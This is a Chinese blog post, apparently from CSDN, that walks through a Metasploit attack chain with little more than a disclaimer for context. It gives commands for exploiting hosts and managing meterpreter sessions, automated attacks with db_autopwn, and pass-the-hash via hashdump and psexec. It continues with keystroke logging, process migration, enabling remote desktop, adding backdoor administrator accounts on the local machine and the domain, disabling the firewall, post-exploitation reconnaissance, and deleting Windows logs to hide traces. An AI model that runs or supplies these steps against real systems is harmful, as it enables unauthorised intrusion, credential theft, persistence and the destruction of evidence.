MSF经典attack示范

免责声明:本文仅做分享... 

目录

Nessus官网

指定攻击

自动在线攻击

nmap扫

查看扫到的服务

查看主机

离线攻击

 Msfvenom

本地快速传递文件的方法-->py

哈希传递攻击

提权

后渗透阶段

1-收集操作系统和版本信息

2-主机名称&环境变量

3-用户账户信息

4-远程端口

5-网络信息

6-应用程序和服务

7-注册表

8-系统权限

9-清理痕迹:


Nessus官网

可以联动MSF.

Tenable 风险暴露管理解决方案指南 | Tenable® (tenablecloud.cn)

试用7day 


指定攻击

手工--命令

创建
--高级扫描
--设置名字,目标--开扫(简单的扫描)

search
use exploit/
show payloads

set windows/meterpreter/
>>tab键

bind一般不过
reverse

show options
set ........
set target ...(不填会默认帮你选)


exploit
meterpreter > sysinfo     //看系统的信息


ctrl+C
background(挂起来)
sessions  //看到拿下的所有会话
sessions ...

sessions -h

session -k id  //踢掉会话

 

自动在线攻击

--先连接数据库欧...

自动化

nmap扫

查看扫到的服务

查看主机


db_autpwn.rb

/usr/share/Metasploit-Framework/plugins/

load xxx

自动干...(时间长) 

db_autpwn -p -t -e

离线攻击

马子上

 Msfvenom

Msfvenom是净荷生成和编码的组合,它在2015年6月8日取代了MsfPayload和MsfEncode这两个工具。

The advantages of msfvenom are(优点):

One single tool (一个单一的集成工具)

Standardizedcommandlineoptions(命令行选项标准化)

Increased speed(优化速度)

msfvenom -l payloads
msfvenom --help-formats
msfvenom -l encoders

马子自己上线吧 


本地快速传递文件的方法-->py

在某个目录下运行: 

python -m SimpleHTTPServer <port>


哈希传递攻击

meterpreter>run hashdump

use exploit/windows/smb/psexec
set 
set smbuser <用户名>
set smbpass <hash值>
exploit


拿下后--->
sysinfo
getuid
ps   --找管理员用的进程
migrate <进程号>    --迁移权限
getuid   

keyscan_start

run get_local_subnets   //网络

添加路由,下一跳的流量给...

run getgui -e    //打开win2008远程桌面


shell
net user xxx xxx /add
net user xxx xxx /add /domain

net localgroup administrators xxx
net localgroup administrators xxx /doamin
net group "域" xxx /add /domain


netsh firewall set opmode enable
netsh firewall set opmode disable


rdesktop <IP>

提权

脚本

MSF全自动:

http://t.csdnimg.cn/7qKYy

CS半自动

域控提权:  CVE + 票据

klist purge
klist

 


后渗透阶段

--得到点东西

(手工/工具)

命令

脚本

1-收集操作系统和版本信息

systeminfo
systeminfo | findstr /B /C:"OS <Name>" 

2-主机名称&环境变量

hostname

set

3-用户账户信息

net user    #查看本地所有用户账户
net localgroup      查看本地所有用户组
netuser/domain      查看域用户账户
net group/domain    查看域用户组
net group "Domain Admins"/domain     查看特定域组中的用户

4-远程端口

netstat -ano | more        查看开放端口与连接

5-网络信息

ipconfig /all        查看网络配置
route print I        查看路由表
arp -a                查看ARP缓存

6-应用程序和服务

wmic product list brief

查看当前已安装的应用程序

7-注册表

直接读取密码?!

Password – Penetration Testing Lab (pentestlab.blog)


8-系统权限

cacls 
cacls c:\

 

wmic > process where name="进程名称.exe" list full
# 显示进程的详细信息

 


9-清理痕迹:

del %WINDIR%*.log /a/s/q/f
# 强制静默删除只读文件

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

金灰

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值